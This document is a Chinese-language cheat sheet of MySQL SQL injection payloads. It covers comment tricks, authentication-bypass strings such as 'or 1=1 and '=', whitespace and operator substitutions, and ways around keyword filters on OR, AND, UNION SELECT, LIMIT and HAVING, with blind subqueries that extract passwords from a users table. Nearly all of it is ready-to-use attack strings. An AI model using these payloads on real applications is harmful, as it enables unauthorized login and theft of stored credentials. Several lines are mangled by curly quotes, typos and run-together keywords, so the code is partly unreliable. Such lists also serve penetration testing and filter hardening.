1 MySQL语法以及认证绕过
注释符:
#
– X(X为任意字符)
/*(MySQL-5.1)
;%00
’
'or 1=1;%00
'or 1=1 union select 1,2
‘or 1=1 #
‘/!50000or/ 1=1 – - //版本号为5.1.38时只要小于50138
‘/!or/ 1=1 – -
前缀:
任意混合 + - ~ !
‘or –+2=- -!!!’2
测试后发现and/or后面可以跟上偶数个!、~可以替代空格,也可以混合使用(混合后规律又不 同),and/or前的空格可以省略
‘or- -!!!1=1;
运算符:
^, =, !=, %, /, *, &, &&, |, ||, <, >, <<, >>, >=, <=, <>, <=>, XOR,DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN,……
‘or 1 rlike ‘1
空格替换:%20, %09, %0a, %0b, %0c, %0d, %a0
也可以插入括号,前缀,操作符,引号
‘or+(1)sounds/**/like”1”–%a0-
字符串格式
’ or “a”=’a’
’ or ‘a’=n’a’ //unicode
’ or ‘a’=b’1100001’ //binary
’ or ‘a’=_binary’1100001’ //5.5.41下测试无效
’ or ‘a’=x’61’ //16进制
2、MySQL常用的一些小工具
常量:true, false, null, \N, current_timestamp….
变量:@myvar:=1
系统变量:@@version, @@datadir….
常用函数:version(), pi(), pow(), char(), substring()….
3、MySQL类型转换
’ or 1=true #true=1, false=0
’ or 1 #true
’ or version()=5.5 #5.5.41-log
’ or round(pi(),1)+true+true+0.4=version() #3.1+1+1+0.4
select * from users where 'a'='b'='c'
select * from users where ('a'='b')='c'
select * from users where (false)='c'
select * from users where (0)='c'
select * from users where (0)=0
select * from users where true
select * from users
4、认证绕过
绕过语句:’=’
select data from users where name=”=”
select data from users where flase=”
select data from users where 0=0
绕过语句:’-‘
select data from users where name=”-”
select data from users where name=0-0
select data from users where 0=0
0x02 关键字过滤
空格
过滤代码/\s/
%20, %09, %0a, %0b, %0c, %0d, %a0
关键字OR,AND
过滤代码/\sor\s/i,/\sand\s/i
‘||1=’1 #or
‘=’
‘&&1=’1 #and
关键字union select
过滤代码/union\s+select/i
‘and(true)like(false)union(select(pass)from(users))#
‘union [all|distinct] select pass from users#
‘union%a0select pass from users#
‘union/!select/pass from users#
/vuln.php?id=1 union/&sort=/select pass from users– -
如果单独过滤union,使用盲注来获取数据
‘and(select pass from users limit 1)=’secret
通过子查询获取单值来进行比较
关键字limit
过滤代码/limit/i
‘and(select pass from users where id=1)=’a
‘and(select pass from users group by id having id=1)=’a
‘and length((select pass from users having substr(pass,1,1)=’a’))
关键字having
过滤代码/having/i
‘and(select substr(group_concat(pass),1,1)from users)=’a
关键字select … from
过滤代码/SELECT\s+[A-Za-z.]+\s+FROM/i/i
select [all|distinct] pass from users
selecttable_name
frominformation_schema
. tables
select pass as alias from users
select pass aliasalias from users
select passalias alias
from users
select+pass%a0from(users)